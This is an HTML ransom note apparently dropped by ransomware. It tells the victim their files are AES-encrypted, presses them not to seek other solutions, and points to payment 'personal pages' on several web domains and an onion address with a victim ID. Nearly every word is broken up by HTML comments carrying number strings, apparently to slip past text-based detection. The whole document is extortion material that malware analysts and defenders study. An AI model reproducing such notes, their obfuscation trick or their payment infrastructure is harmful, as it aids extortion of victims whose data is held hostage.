<html>
 <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }
.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;">  <center>

<div style="text-align:left; font-family:Arial; <!---1238-1237-9+13-2569 -->  font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">
<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>
What<!------1238-1237-9+13-2569 -->  happened <!------1238-1237-9+13-2569 --> to your<!------1238-1237-9+13-2569 -->  files?</b></font><br> <font style="font-size:13px;">All <!------1238-1237-9+13-2569 -->of your files<!------1238-1237-9+13-2569 --> were
<!------1238-1237-9+13-2569  -->  protected by a strong<!------1238-1237-9+13-2569  --> encr<!---1238-1237-9+13-2569 -->yption wi<!---1238-1237-9+13-2569 -->th <!------1238-1237-9+13-2569  -->AES <!------1238-1237-9+13-2569 --> 
<br> More <!------1238-1237-9+13-2569 --> information about the <!------1238-1237-9+13-2569 -->encryption AES can be<!------1238-1237-9+13-2569  -->
fou<!---1238-1237-9+13-2569 -->nd <a href="https://en.wikipedia.org/wiki/AES" target="_blank">https://en<!---1238-1237-9+13-2569 -->.wikipedia.<!---1238-1237-9+13-2569 -->org/wiki/AES</a><br></font>
<br><b><font class="ttl">Wh<!--1238-1237-9+13-2569 -->at <!------1238-1237-9+13-2569 --> does th<!--1238-1237-9+13-2569 -->is mean?</b></font><br><font style="font-size:13px;">

T<!--1238-1237-9+13-2569 -->his<!------1238-1237-9+13-2569 -->  mea<!--1238-1237-9+13-2569 -->ns that the <!------1238-1237-9+13-2569 --> str<!--1238-1237-9+13-2569 -->ucture and da<!--1238-1237-9+13-2569 -->ta wi<!--1238-1237-9+13-2569 -->thin your
<!------1238-1237-9+13-2569 -->files ha<!--1238-1237-9+13-2569 -->ve be<!--1238-1237-9+13-2569 -->en<!------1238-1237-9+13-2569 --> irre<!--1238-1237-9+13-2569 -->voca<!--1238-1237-9+13-2569 -->bly
changed, you will not be able work

wi<!--1238-1237-9+13-2569 -->th
them, read<!------1238-1237-9+13-2569  --> th<!--1238-1237-9+13-2569 -->em or see them, <!------1238-1237-9+13-2569 -->it is the s<!--1238-1237-9+13-2569 -->ame thing 
<!------1238-1237-9+13-2569 -->as los<!--1238-1237-9+13-2569 -->ing <!------1238-1237-9+13-2569 -->them for<!--1238-1237-9+13-2569 -->ever, 
but with our he<!--1238-1237-9+13-2569 -->lp, you  <!------1238-1237-9+13-2569 --> can re<!--1238-1237-9+13-2569 -->st<!--1238-1237-9+13-2569 -->ore t<!--1238-1237-9+13-2569 -->hem 
 <br><br><b><font class="ttl"><!------1238-1237-9+13-2569 -->Ho<!--1238-1237-9+13-2569 -->w d<!--1238-1237-9+13-2569 -->id th<!--1238-1237-9+13-2569 -->is hap<!--1238-1237-9+13-2569 -->pen?<!------1238-1237-9+13-2569 --></b></font>  <br> <!------1238-1237-9+13-2569 --> 
<font style="font-size:13px;"><!------1238-1237-9+13-2569 -->  Espec<!--1238-1237-9+13-2569 -->ially for y<!--1238-1237-9+13-2569 -->ou,<!------1238-1237-9+13-2569 --> on our SER<!--1238-1237-9+13-2569 -->VER <!------1238-1237-9+13-2569 -->was gene<!--1238-1237-9+13-2569 -->rated 
<!------1238-1237-9+13-2569 -->the sec<!--1238-1237-9+13-2569 -->ret k<!--1238-1237-9+13-2569 -->ey
<br>Al<!--1238-1237-9+13-2569-->l y<!--1238-1237-9+13-2569-->our  <!------1238-1237-9+13-2569 --> files w<!--1238-1237-9+13-2569-->ere encry<!--1238-1237-9+13-2569-->pted with the p<!--1238-1237-9+13-2569-->ublic k<!--1238-1237-9+13-2569-->ey, 
<!------1238-1237-9+13-2569 --> wh<!--1238-1237-9+13-2569-->ich has b<!--1238-1237-9+13-2569-->een <!------1238-1237-9+13-2569 --> 
trans<!--1238-1237-9+13-2569-->ferred to  <!------1238-1237-9+13-2569 -->y<!--1238-1237-9+13-2569-->our co<!--1238-1237-9+13-2569-->mputer via  <!------1238-1237-9+13-2569 -->the Inter<!--1238-1237-9+13-2569-->net.<!--1238-1237-9+13-2569--><br>
<!------1238-1237-9+13-2569 --> Decr<!--1238-1237-9+13-2569-->ypting of  <!------1238-1237-9+13-2569 -->YO<!--1238-1237-9+13-2569-->UR FI<!--1238-1237-9+13-2569-->LES is 
<!--1238-1237-9+13-2569 -->on<!--1238-1237-9+13-2569 -->ly p<!--1238-1237-9+13-2569 -->oss<!--1238-1237-9+13-2569-->ible  <!--- -1238-1237-9+13-2569 -->w<!--1238-1237-9+13-2569 -->ith the he<!--1238-1237-9+13-2569-->lp of t<!--1238-1237-9+13-2569 -->he  <!----1238-1237-9+13-2569 -->pri<!--1238-1237-9+13-2569-->va<!--1238-1237-9+13-2569 -->te k<!--1238-1237-9+13-2569-->ey a<!--1238-1237-9+13-2569 -->nd  <!--1238-1237-9+13-2569 -->d<!--1238-1237-9+13-2569 -->ecr<!--1238-1237-9+13-2569-->ypt p<!--1238-1237-9+13-2569 -->rog<!--1238-1237-9+13-2569-->ram 
<!--1238-1237-9+13-2569 -->wh<!--1238-1237-9+13-2569-->ich is on our  <!--- -1238-1237-9+13-2569 -->Sec<!--1238-1237-9+13-2569-->ret  <!--1238-1237-9+13-2569 -->Ser<!--1238-1237-9+13-2569-->ver!!!
</font><br><br><b><font class="ttl">Wh<!--1238-1237-9+13-2569-->at do I do?</b></font> <br><font style="font-size:13px;">Alas, if you   <!--1238-1237-9+13-2569 -->  do not take 
<!---1238-1237-9+13-2569 -->  the nece<!--1238-1237-9+13-2569-->ssary meas<!--1238-1237-9+13-2569-->ures 

<!--1238-1237-9+13-2569-->for the spec<!--1238-1237-9+13-2569-->ified ti<!--1238-1237-9+13-2569-->me th<!--1238-1237-9+13-2569-->en t<!--1238-1237-9+13-2569-->he co<!--1238-1237-9+13-2569-->nditions fo<!--1238-1237-9+13-2569-->r  obta<!--1238-1237-9+13-2569-->ining the priv<!--1238-1237-9+13-2569-->ate
ke<!--1238-1237-9+13-2569-->y w<!--1238-1237-9+13-2569-->ill be cha<!--1238-1237-9+13-2569-->nged<!--- 1238-1237-9+13-2569 -->

<br>
<!-----1238-1237-9+13-2569 --> If you really need <!------1238-1237-9+13-2569  --> your data, <!------1238-1237-9+13-2569 -->then we suggest you <!------1238-1237-9+13-2569 --> do not waste<!------1238-1237-9+13-2569 --> valuable <!------1238-1237-9+13-2569 --> time searching <!------1238-1237-9+13-2569 -->for other  <!------1238-1237-9+13-2569  -->  solutions <!------1238-1237-9+13-2569 -->becausen 
<!----1238-1237-9+13-2569 -->  they do not exist.</font><br><br>
<!----1238-1237-9+13-2569 --><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions,
please<!------1238-1237-9+13-2569 --> visit your <!------1238-1237-9+13-2569 -->  personal <!------1238-1237-9+13-2569 -->home page,<!------1238-1237-9+13-2569 --> there are<!------1238-1237-9+13-2569 --> a few <!------1238-1237-9+13-2569 -->different <!------1238-1237-9+13-2569 -->addresses<!------1238-1237-9+13-2569 --> pointing to <!------1238-1237-9+13-2569 -->   your page<!------1238-1237-9+13-2569 --> below:<b><hr>
<!---21-a12321-234=32=234---> 1 - <a href=http://yyre45dbvn2nhbefbmh.begumvelic.at/81D53C8491979ED4   target="_blank">http://yyre45dbvn2nhbefbmh.begumvelic.at/81D53C8491979ED4</a> <br>
<!------21-a12321-234=32=234  --> 2 - <a href=http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/81D53C8491979ED4   target="_blank">http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/81D53C8491979ED4</a> <br>
<!------21-a12321-234=32=234  --> 3 - <a href=http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/81D53C8491979ED4   target="_blank">http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/81D53C8491979ED4</a> <br>
<!------21-a12321-234=32=234  --></div><br><div class="tb" style="font-size:13px; border-color:#880000;"><b>If for some reasons the
<!-----21-a12321-234=32=234  --> addresses are not available, <!------21-a12321-234=32=234  --> follow these steps:</b> <hr>

1 - <!------21-a12321-234=32=234  -->  Download and <!------21-a12321-234=32=234  --> install tor-browser: 
<a href=http://www.torproject.org/projects/torbrowser.html.en  target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>
2 - <!---21-a12321-234=32=234  -->  Af<!---21-a12321-234=32=234--->ter a<!---21-a12321-234=32=234---> succe<!---21-a12321-234=32=234--->ssful<!------21-a12321-234=32=234  --> instal<!---21-a12321-234=32=234--->lation, run the br<!---21-a12321-234=32=234--->owser and w<!---21-a12321-234=32=234--->ait for initi<!---21-a12321-234=32=234--->alization.<br>
3 - <!--- 21-a12321-234=32=234  --> Ty<!---21-a12321-234=32=234--->pe<!-- 21-a12321-234=32=234  --> in<!-- 21-a12321-234=32=234  --> the t<!---21-a12321-234=32=234--->or-bro<!---21-a12321-234=32=234--->wser<!-- 21-a12321-234=32=234  --> add<!---21-a12321-234=32=234--->ress<!-- 21-a12321-234=32=234  --> bar: <font style="font-weight:bold; color:#009977;"><!-- 21-a12321-234=32=234  -->xlowfznrg4wf7dli.onion/81D53C8491979ED4<!-- 21-a12321-234=32=234  --></font><!-- 21-a12321-234=32=234  --><br>
4 - <!--- 21-a12321-234=32=234  -->  Fol<!---21-a12321-234=32=234--->low the instr<!---21-a12321-234=32=234--->uctions <!-- 21-a12321-234=32=234  --> on the site.</div><br><br><b>!!! IMPO<!---21-a12321-234=32=234--->RTANT INFO<!---21-a12321-234=32=234--->RMATION:</b><br>
<!-----21-a12321-234=32=234  --><div class="tb" style="width:790px;"><!-----21-a12321-234=32=234  --> Yo<!---21-a12321-234=32=234--->ur Pers<!---21-a12321-234=32=234--->onal PAGES<b>: 
<br> <a href=http://yyre45dbvn2nhbefbmh.begumvelic.at/81D53C8491979ED4 target="_blank">http://yyre45dbvn2nhbefbmh.begumvelic.at/81D53C8491979ED4</a> <br><a href=http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/81D53C8491979ED4 target="_blank">http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/81D53C8491979ED4</a> <br>
<!-----21-a12321-234=32=234  --><a href=http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/81D53C8491979ED4 target="_blank">http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/81D53C8491979ED4</a>  <br> 
<!-----21-a12321-234=32=234  --> Your <!------21-a12321-234=32=234  --> Personal TOR-Browser<!-----21-a12321-234=32=234  --> page :
<!-----21-a12321-234=32=234  --><font style="font-weight:bold; color:#009977;"><!-- 21-a12321-234=32=234  -->xlowfznrg4wf7dli.onion/81D53C8491979ED4<!-- 21-a12321-234=32=234  --></font><br>
<!-----21-a12321-234=32=234  --> Your personal <!------21-a12321-234=32=234  -->  ID 
<!-----21-a12321-234=32=234  -->  (if you open <!------21-a12321-234=32=234  --> the site directly):
<!-----21-a12321-234=32=234  --> <font style="font-weight:bold; color:#770000;">81D53C8491979ED4</font><br>
</div></div></center></body></html>